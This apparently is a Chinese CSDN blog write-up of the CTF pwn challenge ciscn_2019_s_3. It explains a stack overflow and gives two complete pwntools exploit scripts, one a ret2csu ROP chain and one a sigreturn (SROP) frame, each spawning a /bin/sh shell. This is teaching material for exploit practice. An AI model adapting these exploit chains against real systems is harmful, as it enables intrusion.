ciscn_2019_s_3(execve&&sigreturn)

最新推荐文章于 2023-09-23 17:10:22 发布
最新推荐文章于 2023-09-23 17:10:22 发布
阅读量217 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33590156/article/details/119391368
版权

本题是一个系统调用,存在栈溢出,要点有以下几点,以下为第一种解法,构造execve(’/bin/sh’,0,0)

1.题目中,并未出现sub esp得字眼,所以本题中ebp一直与esp重合,即最后ret得时候,pop的其实是rbp处的地址,所以本题返回点并不在ret处,而在rbp处。

2.本题没有‘/bin/sh’,所以只能自己输入到栈上,这时就需要泄漏栈的地址,在使用gdb调试后,可以看到在ret地址后面有存储一个栈地址(即可以泄漏),再在调用syswrite时,可以看到buf的地址,经过计算后,得出偏移为0x118,所以我们写入的‘/bin/sh’地址可以得到,此时再返回vuln函数。

3.在sendline之前可以写上

gdb.attach(ms)

pause()

打开gdb进行动调。

4.本题调用execve(’/bin/sh’,0,0),需要把给rax传入系统调用号,’/bin/sh’传给rdi,0传给rsi,和rdx。通过ropgadget可以找到libc_csu的地方,用于寻找gadgets

5.在payload1中,由于整个题目只有mov rdx,r13,mov rsi,r14可以控制rdx,之后又因为call r12+rbx*8,所以需要用pop构造r12,r13,r14,rbx的值,而在r12处放上binsh_addr+0x50(mov_rax_ret在栈上的地址),等会儿会call这里。

所以整个程序流执行时,

(1)首先进行pop五个,给寄存器赋值。此时rbx=r13=r14=0,r12=mov_rax_ret,ret后

(2)跳转到mov_rdx_r13_rsi_r14_call的地址,mov两个值,此时rdx=rsi=0

(3)之后进行call r12+rbx*8,也就是r12的地址,call的同时,将add rbx,1(call的后一条地址)压入栈,之后jmp跳转到mov_rax_ret(传入系统调用号),ret时pop的就是add rbx,1

(4)执行完后返回到add rbx,1,因为rbx++,所以,cmp不通过,执行跳转,跳到mov_rdx_r13_rsi_r14_call起始点,再次执行到call r12+rbx *8,压入add rbx,1,但此时的rbx是1,所以跳转地址变成了binsh_addr+0x58(pop rdi),执行一次pop_rdi,将add rbx,1 pop给了rdi,执行ret时,pop了栈上的mov_rax_ret给eip,在ret 到pop_rdi,将栈上的binsh给rdi,最后执行syscall。

from pwn import * 
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')

ms = process("./ciscn_s_3")
#ms = remote('node3.buuoj.cn',25636)

#elf = ELF('./ciscn_s_3')


mov_rax_ret = 0x4004E2
pop_rdi_ret = 0x4005A3
pop_rbx_rbp_r12_r13_r14_r15_ret = 0x40059a
mov_rdx_r13_rsi_r14_call = 0x400580

vuln_addr = 0x4004ed
syscall_addr = 0x400501

# gdb.attach(ms)
# pause()
payload = '/bin/sh\x00'+'b'*0x7+'c'*0x1+p64(vuln_addr)
ms.sendline(payload)
ms.recvuntil('c')
ms.recv(16)
binsh_addr = u64(ms.recv(8).ljust(8,'\x00'))-0x118
log.info("binsh_addr="+hex(binsh_addr))
ms.recv(8)

payload1 = '/bin/sh\x00'+'a'*0x8+p64(pop_rbx_rbp_r12_r13_r14_r15_ret)+p64(0)+p64(0)
payload1+= p64(binsh_addr+0x50)+p64(0)+p64(0)+p64(0)+p64(mov_rdx_r13_rsi_r14_call)
payload1+= p64(mov_rax_ret)+p64(pop_rdi_ret)+p64(binsh_addr)
payload1+= p64(syscall_addr)

ms.sendline(payload1)
ms.interactive()

上面方法比较麻烦,本题直接给了给rax赋值15,也就是调用sigreturn,所以下面还附上使用sigreturn框架的脚本

from pwn import * 
from LibcSearcher import *
context(os='linux',arch='amd64',log_level='debug')

#ms = remote("node3.buuoj.cn", 25192)
ms = process("./ciscn")
elf = ELF("./ciscn")

sigreturn_addr = 0x4004DA
syscall_addr = 0x400517
vuln_addr = 0x4004ED

payload = "/bin/sh\x00"+'a'*0x8+p64(vuln_addr)
ms.send(payload)
ms.recv(0x20)
stack_addr = u64(ms.recv(6).ljust(8,'\x00'))-0x118
log.info("stack_addr="+hex(stack_addr))

frame = SigreturnFrame()
frame.rax = 59
frame.rdi = stack_addr
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_addr

payload1 = "/bin/sh\x00"+'a'*0x8+p64(sigreturn_addr)+p64(syscall_addr)+str(frame)

ms.send(payload1)
ms.interactive()
Wust-Mo0n5ea丶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ciscn_2019_s_3
qq_45691294的博客
12-29 2154
首先拿到程序先查看一下程序类型 是一个x86-64的ELF文件,查看一下保护,只开启了堆栈不可执行保护 用IDA分析一下该程序 main函数直接进入到vuln函数,这里利用了系统调用,64位的系统调用的传参方式为 首先将系统调用号 传入 rax,然后将参数 从左到右 依次存入 rdi,rsi,rdx寄存器中,返回值存在rax寄存器 vuln函数执行了read(0,buf,0x400),又执行了write(1,buf,0x30)。看一下buf的位置,发现距离rbp只有0x10大小,存在栈溢出 这里的栈
2019ciscn_s_3
Hyrink的博客
06-07 470
ciscn_s_3的两种解法:SROP & ret2csu详解
ctf【ciscn_2019_s_3】
HUANGliang_的博客
10-29 476
ciscn_2019_s_3
详细ciscn_2019_s_3题解
xieyichensss的博客
04-23 1381
来了来了,我拖了好久,因为吧,之前做了个堆题,大概用了一周才做完,做完堆题,下一个题是栈的,我以为会很简单,但是对我来说很难诶。上才艺… (系统调用其他师傅都有写,我就不赘述啦啦啦啦啦),因为师傅们翻到我这里肯定对系统调用有了解了呀,我这么菜,只能在最下边呜呜呜。 1.拖入ida,反汇编(64位),注意到函数传参与32位会不同。 在函数框内发现vuln(大家应该对这种函数很熟悉了吧),还有gadgets函数,奇怪,正常的栈不会有这种东西啊,于是我就点进去看了看,看到了这两个像rax进行传参的汇编,这就为我们
ciscn_2019_s_3(系统调用综合)
weixin_61283545的博客
06-11 714
打开函数只有read和write。发现gadget函数,这道题重要关键在于系统调用号。发现gadget rax赋值为59,调用execve,ida H键变10进制,调用execve需要$rax==59$rdi==“/bin/sh”$rsi==0$rdx==0syscall这时候就需要用到libc_csu辅助,ropper里面可以找到pop rdi,/bin/sh\x00我们可以直接通过read写入栈中,其他的利用gadget进行填充。 注意的是read后面没有leave不用填充。还有一点在执行csu_e
sys_prog.tar.gz_redhat 9
09-24
3. **进程管理**:包括进程创建(`fork()`, `vfork()`, `clone()`),进程通信(信号、管道、共享内存、消息队列),以及进程同步和互斥(`mutex`, `semaphore`, `condition variable`)。 4. **线程编程**:在多...
linux 中的sys_execve机理
11-28
在Linux操作系统中,`sys_execve`是一个系统调用,它是程序执行的核心机制。这个调用使得一个进程能够替换其当前的执行上下文,加载并运行新的可执行文件。通过理解`sys_execve`的工作原理,我们可以更好地了解进程...
linux-kernel-api.rar_linux kernel
09-24
如`fork()`用于创建新进程,`execve()`用于执行新的程序,`waitpid()`等待子进程结束,以及线程的创建和管理API如`pthread_create()`。 2. **内存管理**:Linux内核的内存管理API包括动态内存分配(如`malloc()`、`...
linux-c-man.rar_linux man
09-23
2. `fork`、`execve`:进程创建与执行新程序的函数。 3. `signal`、`raise`:信号处理函数,用于处理进程间的通信和异常。 4. `socket`、`bind`、`connect`、`listen`、`accept`:网络编程相关的函数,构建网络通信...
linux_c_func.rar_linux 函数库
09-22
3. **字符串处理**: - `strcpy`,`strcat`,`strcmp`:用于复制、连接和比较字符串。 - `strlen`:计算字符串长度。 - `strstr`:在字符串中查找子串。 4. **文件操作**: - `fopen`,`fclose`:打开和关闭...
Ret2csu level5 & ciscn_2019_s_3
红叶的博客
11-06 430
本题难点:对栈的理解需要稍微更深入一点。
【BUUCTFPwn】Ciscn_2019_s_3 | SROP SigreturnFrame函数使用
m0_55368674的博客
02-18 480
【BUUCTFPwn】Ciscn_2019_s_3 | SROP SigreturnFrame函数使用
[PWN] ciscn_2019_s_3 ret2csu SROP
最新发布
LDX的博客
09-23 57
[PWN] ret2csu SROP
【pwn】ciscn_2019_s_3
Nothing
12-14 4511
这题是全国大学生信息安全竞赛的一道线下半决赛题目,好像是华南赛区? 例行检查。 分析程序。 vul函数 两个系统调用,一个是sys_read,一个是sys_write,往栈上写数据(0x400),从栈上读数据(0x30),存在栈溢出。 还有一个gadget函数。 有两个值得注意的地方。mov rax,0fh 以及mov rax 59。这两个gadget控制了rax的值,看看这两个是什么系统调用...
CTF buuoj pwn-----第12题: ciscn_2019_s_3
bing_Max的博客
10-09 1476
函数分析 编写exp from pwn import * sh = remote('node4.buuoj.cn', 27939) context(arch='amd64',os='linux', log_level='debug') main_addr= 0x4004ED # 这里其实是vuln的地址, main地址会错:timeout: the monitored command dumped core payload_1 = b'/bin/sh\x00' + b'a'*0x8 + p.
buuctf ciscn_2019_s_3
carol2358的博客
04-20 1344
这题对还是萌新的我来说有点难,用的SROP 在这里插入图片描述
【Pwn】ciscn_2019_s_3 wp 解析(bin/sh+0x50)
Lcw_linyx的博客
05-09 1111
本题用到了ret2csu,也可通过srop,重点讲/bin/sh+0x50
ucore操作系统执行do_execve的进程启动步骤解析
"操作系统期末考试分析,ucore操作系统执行do_execve过程详解" 在操作系统中,do_execve系统调用是用于启动一个新的用户态进程的关键功能。在这个过程中,ucore操作系统需要进行一系列的准备工作,确保新进程能够...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值